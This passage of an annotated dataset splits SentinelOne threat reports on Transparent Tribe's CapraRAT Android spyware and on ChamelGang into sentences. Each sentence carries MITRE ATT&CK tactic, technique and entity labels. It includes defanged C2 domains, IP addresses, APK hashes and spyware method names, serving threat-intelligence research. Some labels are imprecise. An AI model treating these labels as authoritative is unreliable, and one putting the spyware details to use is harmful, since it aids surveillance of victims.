"sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 91, "context_before": "| Universal 7e07765bf8ee2d0b2233039623016d6dfb610a6d | Backdoor | Macho | x86_64", "sentence_text": "baf4da6b89b7d7cbf24c9deef5984ef9dfd52e6a", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s93-4993e9", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 93, "context_before": "| Dropper", "sentence_text": "| Macho | Universal e5d97afa5f1501b3d5ec1a471dc8a3b8e2a84fdb | Dropper", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s94-b9794f", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 94, "context_before": "| Macho | Universal e5d97afa5f1501b3d5ec1a471dc8a3b8e2a84fdb | Dropper", "sentence_text": "[FILTERED_TABLES_END]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s1-cf7363", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "The overall functionality remains the same, with the underlying code updated to better suit modern Android devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s2-7af99c", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "The overall functionality remains the same, with the underlying code updated to better suit modern Android devices.", "sentence_text": "Overview\nTransparent Tribe ( aka APT 36, Operation C-Major) has been active since at least with attacks against Indian government and military personnel.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s3-3d2020", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "Overview\nTransparent Tribe ( aka APT 36, Operation C-Major) has been active since at least with attacks against Indian government and military personnel.", "sentence_text": "The group relies heavily on social engineering attacks to deliver a variety of Windows and Android spyware, including spear-phishing and watering hole attacks.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1608", "name": "Stage Capabilities" } ], "procedure": "Use social engineering (spear-phishing, watering hole attacks) to deliver Windows and Android spyware", "entities": [ { "text": "social engineering attacks", "start": 28, "end": 54, "label": "Action" }, { "text": "deliver a variety of Windows and Android spyware", "start": 58, "end": 106, "label": "Action" }, { "text": "spear-phishing", "start": 118, "end": 132, "label": "Action" }, { "text": "watering hole", "start": 137, "end": 150, "label": "Action" } ] }, { "uid": "sentinel-55_SentinelOne_report-p1-s4-332f63", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "The group relies heavily on social engineering attacks to deliver a variety of Windows and Android spyware, including spear-phishing and watering hole attacks.", "sentence_text": "The activity highlighted in this report shows the continuation of this technique with updates to the social engineering pretexts as well as efforts to maximize the spyware’s compatibility with older versions of the Android operating system while expanding the attack surface to include modern versions of Android.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Maximize spyware's compatibility with older versions of android OS, and include newer versions as well", "entities": [ { "text": "maximize the spyware’s compatibility with older versions of the Android operating system", "start": 151, "end": 239, "label": "Action" }, { "text": "expanding the attack surface", "start": 246, "end": 274, "label": "Action" }, { "text": "Android operating system", "start": 215, "end": 239, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-55_SentinelOne_report-p1-s5-169fa6", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "The activity highlighted in this report shows the continuation of this technique with updates to the social engineering pretexts as well as efforts to maximize the spyware’s compatibility with older versions of the Android operating system while expanding the attack surface to include modern versions of Android.", "sentence_text": "New CapraRAT APKs The new versions of CapraRAT each use WebView to launch a URL to either YouTube or a mobile gaming site, CrazyGames[.]com .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s6-8653d1", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "New CapraRAT APKs The new versions of CapraRAT each use WebView to launch a URL to either YouTube or a mobile gaming site, CrazyGames[.]com .", "sentence_text": "The URL query in the CapraRAT code is obfuscated as h tUUtps://www.youUUtube.com/resulUUts?seUUarch_quUUery=TiUUk+ToUUks , which is cleaned to remove occurrences of UU, resulting in The previous CapraTube campaign had one APK called Piya Sharma that was likely used in a romance-themed social engineering pretext.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "Use obfuscated URL queries and romance-themed social engineering", "entities": [ { "text": "obfuscated ", "start": 38, "end": 49, "label": "Action" }, { "text": "CapraRAT ", "start": 21, "end": 30, "label": "MalwareTool" }, { "text": "h tUUtps://www.youUUtube.com/resulUUts?seUUarch_quUUery=TiUUk+ToUUks", "start": 52, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "Piya Sharma", "start": 233, "end": 244, "label": "MalwareTool" }, { "text": "used in a romance-themed social engineering pretext", "start": 261, "end": 312, "label": "Action" } ] }, { "uid": "sentinel-55_SentinelOne_report-p1-s7-33dfa3", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "The URL query in the CapraRAT code is obfuscated as h tUUtps://www.youUUtube.com/resulUUts?seUUarch_quUUery=TiUUk+ToUUks , which is cleaned to remove occurrences of UU, resulting in The previous CapraTube campaign had one APK called Piya Sharma that was likely used in a romance-themed social engineering pretext.", "sentence_text": "The new campaign continues that trend with the Sexy Videos app.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s8-e94c05", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "The new campaign continues that trend with the Sexy Videos app.", "sentence_text": "While two of the previously reported apps launched only YouTube with no query, the YouTube apps from this campaign are each preloaded with a query related to the application’s theme.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s9-33e83c", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "While two of the previously reported apps launched only YouTube with no query, the YouTube apps from this campaign are each preloaded with a query related to the application’s theme.", "sentence_text": "The Crazy Games app launches WebView to load CrazyGames[.]com , a site containing in-browser mini games.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s10-593ce5", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "The Crazy Games app launches WebView to load CrazyGames[.]com , a site containing in-browser mini games.", "sentence_text": "This particularly resource-intensive site did not work well on older versions of Android during our testing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s11-84f384", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "This particularly resource-intensive site did not work well on older versions of Android during our testing.", "sentence_text": "App Compatibility\nThe most significant changes between this campaign and the September 2023 campaign are to app compatibility.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s12-abd505", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "App Compatibility\nThe most significant changes between this campaign and the September 2023 campaign are to app compatibility.", "sentence_text": "Previous versions relied on the device running Lollipop (Android 5.1), which was released in 2015 and less likely to be compatible with modern Android devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s13-c0ab5e", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "Previous versions relied on the device running Lollipop (Android 5.1), which was released in 2015 and less likely to be compatible with modern Android devices.", "sentence_text": "We tested the APKs from this campaign and the September 2023 campaign on an Android device running Android Tiramisu aka Android 13 (2022) and Android 14 (2023).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s14-e5d2a6", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "We tested the APKs from this campaign and the September 2023 campaign on an Android device running Android Tiramisu aka Android 13 (2022) and Android 14 (2023).", "sentence_text": "The new campaign’s apps ran smoothly on this modern version of Android.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s15-7894d3", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "The new campaign’s apps ran smoothly on this modern version of Android.", "sentence_text": "The September 2023 campaign apps prompted a compatibility warning dialog, which could raise suspicion among victims that the app is abnormal.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s16-17218c", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "The September 2023 campaign apps prompted a compatibility warning dialog, which could raise suspicion among victims that the app is abnormal.", "sentence_text": "When running on the newest released version of Android 14, the September 2023 campaign’s Piya Sharma app fails to install.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s17-6c1672", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "When running on the newest released version of Android 14, the September 2023 campaign’s Piya Sharma app fails to install.", "sentence_text": "Each of the newer versions ran successfully.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s18-0321e7", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "Each of the newer versions ran successfully.", "sentence_text": "In all cases, the app still requests gratuitous permissions from the user that hint to the tool’s capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s19-938a3e", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "In all cases, the app still requests gratuitous permissions from the user that hint to the tool’s capabilities.", "sentence_text": "Spyware Activities and C2", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s20-a9dfe9", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "Spyware Activities and C2", "sentence_text": "The app’s MainActivity initiates requests for permissions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s21-533cde", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "The app’s MainActivity initiates requests for permissions.", "sentence_text": "The app still runs even if permissions are not granted.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s22-e03fec", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "The app still runs even if permissions are not granted.", "sentence_text": "MainActivity\ncalls the\nTCHPClient\nclass, which contains the malicious capabilities leveraged by CapraRAT.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Calls TCHPClient class that contains malicious capabilities", "entities": [ { "text": "CapraRAT", "start": 96, "end": 104, "label": "ThreatActor" }, { "text": "TCHPClient\nclass", "start": 23, "end": 39, "label": "MalwareTool" }, { "text": "contains the malicious capabilities", "start": 47, "end": 82, "label": "Action" } ] }, { "uid": "sentinel-55_SentinelOne_report-p1-s23-37aad7", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "MainActivity\ncalls the\nTCHPClient\nclass, which contains the malicious capabilities leveraged by CapraRAT.", "sentence_text": "This class drives several spyware classes and methods, including:\naudioStreamer\n(\naStreamer\n)\nCallLogLister\nCallReceiver\nDirLister\n(file browsing)\ndownloadFile\nkillFile\n(file deletion)\nkillProcess\nPhotoTaker\nSMSLister\nSMSReceiver\nThese give the spyware fine-grained control over what the user does on the device.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s24-0830d8", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "This class drives several spyware classes and methods, including:\naudioStreamer\n(\naStreamer\n)\nCallLogLister\nCallReceiver\nDirLister\n(file browsing)\ndownloadFile\nkillFile\n(file deletion)\nkillProcess\nPhotoTaker\nSMSLister\nSMSReceiver\nThese give the spyware fine-grained control over what the user does on the device.", "sentence_text": "The\nsendData\nmethod is responsible for constructing the data collected by other methods and classes and sending it to the C2.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s25-bb7e3b", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "The sendData method is responsible for constructing the data collected by other methods and classes and sending it to the C2.", "sentence_text": "The mRun method constructs the socket and sends the data to the C2 server using the variables specified in the Settings class.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s26-914e41", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "The mRun method constructs the socket and sends the data to the C2 server using the variables specified in the Settings class.", "sentence_text": "Each of the current campaign’s APKs use the same C2 server hostname, IP address and TCP port number 18582.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s27-85638c", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "Each of the current campaign’s APKs use the same C2 server hostname, IP address and TCP port number 18582.", "sentence_text": "The Settings class also shows the same CapraRAT version identifier for each APK, A.D.0.2 mRun performs a connectivity check to decide whether to connect to the C2 using the hostname shareboxs[.]net or the hardcoded IP address 173[.]249[.]50[.]243 .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "mRun checks connectivity to decide whether to connect to C2 using hostname or IP address", "entities": [ { "text": "Settings class", "start": 4, "end": 18, "label": "Infrastructure_Indicator" }, { "text": "CapraRAT ", "start": 39, "end": 48, "label": "MalwareTool" }, { "text": "APK", "start": 76, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "A.D.0.2 mRun", "start": 81, "end": 93, "label": "Infrastructure_Indicator" }, { "text": " performs a connectivity check", "start": 93, "end": 123, "label": "Action" }, { "text": "connect to the C2 using the hostname shareboxs[.]net or the hardcoded IP address 173[.]249[.]50[.]243 .", "start": 145, "end": 248, "label": "Action" }, { "text": "shareboxs[.]net", "start": 182, "end": 197, "label": "Infrastructure_Indicator" }, { "text": "IP address 173[.]249[.]50[.]243", "start": 215, "end": 246, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-55_SentinelOne_report-p1-s28-2a9f6a", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "The Settings class also shows the same CapraRAT version identifier for each APK, A.D.0.2 mRun performs a connectivity check to decide whether to connect to the C2 using the hostname shareboxs[.]net or the hardcoded IP address 173[.]249[.]50[.]243 .", "sentence_text": "This IP address has been tied to Transparent Tribe’s CrimsonRAT and AhMyth Android RAT C2 activity since at least 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s29-89baff", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "This IP address has been tied to Transparent Tribe’s CrimsonRAT and AhMyth Android RAT C2 activity since at least 2022.", "sentence_text": "The APK theme updates show the group continues to lean into its social engineering prowess to gain a wider audience of targets who would be interested in the new app lures, such as mobile gamers or weapons enthusiasts.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Update themes to gain a wider audience of targets", "entities": [ { "text": "APK ", "start": 4, "end": 8, "label": "Infrastructure_Indicator" }, { "text": "lean into its social engineering prowess", "start": 50, "end": 90, "label": "Action" }, { "text": "gain a wider audience of targets", "start": 94, "end": 126, "label": "Action" } ] }, { "uid": "sentinel-55_SentinelOne_report-p1-s30-7d19eb", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "The APK theme updates show the group continues to lean into its social engineering prowess to gain a wider audience of targets who would be interested in the new app lures, such as mobile gamers or weapons enthusiasts.", "sentence_text": "To help prevent compromise by CapraRAT and similar malware, users should always evaluate the permissions requested by an app to determine if they are necessary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s31-acf54b", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "To help prevent compromise by CapraRAT and similar malware, users should always evaluate the permissions requested by an app to determine if they are necessary.", "sentence_text": "In incident response scenarios, treat the related network indicators of compromise as suspect, including the use of port 18582, and search suspect apps for the presence of strings using the unique method names outlined in the Spyware Activities & C2 section of this report.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s32-71f1c1", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "In incident response scenarios, treat the related network indicators of compromise as suspect, including the use of port 18582, and search suspect apps for the presence of strings using the unique method names outlined in the Spyware Activities & C2 section of this report.", "sentence_text": "Indicators of Compromise Files Network Indicators adversary Share Alex Delamotte Alex's passion for cybersecurity is humbly rooted in the early aughts, when she declared a vendetta against a computer worm.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s33-155717", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "Indicators of Compromise Files Network Indicators adversary Share Alex Delamotte Alex's passion for cybersecurity is humbly rooted in the early aughts, when she declared a vendetta against a computer worm.", "sentence_text": "Alex enjoys researching the intersection of cybercrime and state-sponsored activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s34-5aa501", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "Alex enjoys researching the intersection of cybercrime and state-sponsored activity.", "sentence_text": "She relentlessly questions why actors pivot to a new technique or attack surface.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s35-31c035", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "She relentlessly questions why actors pivot to a new technique or attack surface.", "sentence_text": "In her spare time, she can be found DJing or servicing her music arcade games.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s36-939e77", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "In her spare time, she can be found DJing or servicing her music arcade games.", "sentence_text": "Prev\nChamelGang & Friends | Cyberespionage Groups Attacking Critical Infrastructure with Ransomware Next NullBulge | Threat Actor Masquerades as Hacktivist Group Rebelling Against AI Related Posts PhantomCaptcha | Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation October 22 2025 Contagious Interview | North Korean Threat Actors Reveal Plans and Ops by Abusing Cyber Intel Platforms September 04 2025 Top Tier Target | What It Takes to Defend a Cybersecurity Company from Today’s Adversaries April 28 2025", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s37-8801c8", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "Prev\nChamelGang & Friends | Cyberespionage Groups Attacking Critical Infrastructure with Ransomware Next NullBulge | Threat Actor Masquerades as Hacktivist Group Rebelling Against AI Related Posts PhantomCaptcha | Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation October 22 2025 Contagious Interview | North Korean Threat Actors Reveal Plans and Ops by Abusing Cyber Intel Platforms September 04 2025 Top Tier Target | What It Takes to Defend a Cybersecurity Company from Today’s Adversaries April 28 2025", "sentence_text": "[FILTERED_TABLES_START]\nSHA-1 | c307f523a1d1aa928fe3db2c6c3ede6902f1084b App Name | Crazy Game signed.apk Package Name | com.maeps.crygms.tktols", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s38-bd53ed", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "[FILTERED_TABLES_START]\nSHA-1 | c307f523a1d1aa928fe3db2c6c3ede6902f1084b App Name | Crazy Game signed.apk Package Name | com.maeps.crygms.tktols", "sentence_text": "SHA-1 | dba9f88ba548cebfa389972cddf2bec55b71168b App Name | Sexy Videos signed.apk Package Name | com.nobra.crygms.tktols", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s39-30941a", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "SHA-1 | dba9f88ba548cebfa389972cddf2bec55b71168b App Name | Sexy Videos signed.apk Package Name | com.nobra.crygms.tktols", "sentence_text": "SHA-1 | 28bc3b3d8878be4267ee08f20b7816a6ba23623e App Name | TikTok signed.apk Package Name | com.maeps.vdosa.tktols", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s40-f8c397", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "SHA-1 | 28bc3b3d8878be4267ee08f20b7816a6ba23623e App Name | TikTok signed.apk Package Name | com.maeps.vdosa.tktols", "sentence_text": "SHA-1 | fff24e9f11651e0bdbee7c5cd1034269f40fc424 App Name | Weapons signed.apk Package Name | com.maeps.vdosa.tktols 28bc3b3d8878be4267ee08f20b7816a6ba23623e | TikTok signed.apk c307f523a1d1aa928fe3db2c6c3ede6902f1084b | Crazy Game signed.apk dba9f88ba548cebfa389972cddf2bec55b71168b | Sexy Videos signed.apk fff24e9f11651e0bdbee7c5cd1034269f40fc424 | Weapons signed.apk shareboxs[.]net | C2 domain 173[.]212[.]206[.]227 | Resolved C2 IP address, hosts shareboxs.net 173[.]249[.]50[.]243 | Hardcoded failover C2 IP address", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-55_SentinelOne_report-p1-s41-bdfc68", "source": "sentinel", "doc_id": "55_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "SHA-1 | fff24e9f11651e0bdbee7c5cd1034269f40fc424 App Name | Weapons signed.apk Package Name | com.maeps.vdosa.tktols 28bc3b3d8878be4267ee08f20b7816a6ba23623e | TikTok signed.apk c307f523a1d1aa928fe3db2c6c3ede6902f1084b | Crazy Game signed.apk dba9f88ba548cebfa389972cddf2bec55b71168b | Sexy Videos signed.apk fff24e9f11651e0bdbee7c5cd1034269f40fc424 | Weapons signed.apk shareboxs[.]net | C2 domain 173[.]212[.]206[.]227 | Resolved C2 IP address, hosts shareboxs.net 173[.]249[.]50[.]243 | Hardcoded failover C2 IP address", "sentence_text": "[FILTERED_TABLES_END]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s1-7b2b3a", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "This report introduces new findings about notable intrusions in the past three years, some of which were carried out by a Chinese cyberespionage actor but remain publicly unattributed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s2-0b970e", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "This report introduces new findings about notable intrusions in the past three years, some of which were carried out by a Chinese cyberespionage actor but remain publicly unattributed.", "sentence_text": "Attribution information on these attacks has not been publicly released to date.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s3-dab6e9", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "Attribution information on these attacks has not been publicly released to date.", "sentence_text": "ChamelGang also targeted a government organization in East Asia and critical infrastructure sectors, including an aviation organization in the Indian subcontinent.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s4-a08384", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "ChamelGang also targeted a government organization in East Asia and critical infrastructure sectors, including an aviation organization in the Indian subcontinent.", "sentence_text": "While attribution for this secondary cluster remains unclear, overlaps exist with past intrusions that involve artifacts associated with suspected Chinese and North Korean APT clusters.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s5-c74a1a", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "While attribution for this secondary cluster remains unclear, overlaps exist with past intrusions that involve artifacts associated with suspected Chinese and North Korean APT clusters.", "sentence_text": "Read the Full Report Overview In collaboration with Recorded Future, SentinelLABS has been tracking two distinct activity clusters targeting government and critical infrastructure sectors globally between 2021 and 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s6-b25928", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "Read the Full Report Overview In collaboration with Recorded Future, SentinelLABS has been tracking two distinct activity clusters targeting government and critical infrastructure sectors globally between 2021 and 2023.", "sentence_text": "We associate one activity cluster with the suspected Chinese APT group ChamelGang (also known as CamoFei), while the second cluster resembles previous intrusions involving artifacts linked to suspected Chinese and North Korean APT groups.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s7-e756a4", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "We associate one activity cluster with the suspected Chinese APT group ChamelGang (also known as CamoFei), while the second cluster resembles previous intrusions involving artifacts linked to suspected Chinese and North Korean APT groups.", "sentence_text": "The majority of the activities we analyzed involve ransomware or data encryption tooling.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Ransomware and data encryption tooling", "entities": [ { "text": "ransomware ", "start": 51, "end": 62, "label": "Action" }, { "text": "data encryption tooling", "start": 65, "end": 88, "label": "Action" } ] }, { "uid": "sentinel-56_SentinelOne_report-p1-s8-65bffd", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "The majority of the activities we analyzed involve ransomware or data encryption tooling.", "sentence_text": "ChamelGang\nWe identified indicators suggesting that in 2023, ChamelGang targeted a government organization in East Asia and an aviation organization in the Indian subcontinent.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s9-a5eff1", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "ChamelGang\nWe identified indicators suggesting that in 2023, ChamelGang targeted a government organization in East Asia and an aviation organization in the Indian subcontinent.", "sentence_text": "This aligns with known ChamelGang victimology – previous ChamelGang attacks have impacted critical sectors in Russia, including aviation, as well as government and private organizations in other countries such as the United States, Taiwan, and Japan.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s10-93bb09", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "This aligns with known ChamelGang victimology – previous ChamelGang attacks have impacted critical sectors in Russia, including aviation, as well as government and private organizations in other countries such as the United States, Taiwan, and Japan.", "sentence_text": "These attacks were publicly disclosed as ransomware incidents and attribution information regarding the perpetrators has never been released.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s11-dc9894", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "These attacks were publicly disclosed as ransomware incidents and attribution information regarding the perpetrators has never been released.", "sentence_text": "We discovered strong indicators pointing to these institutions as being targeted using 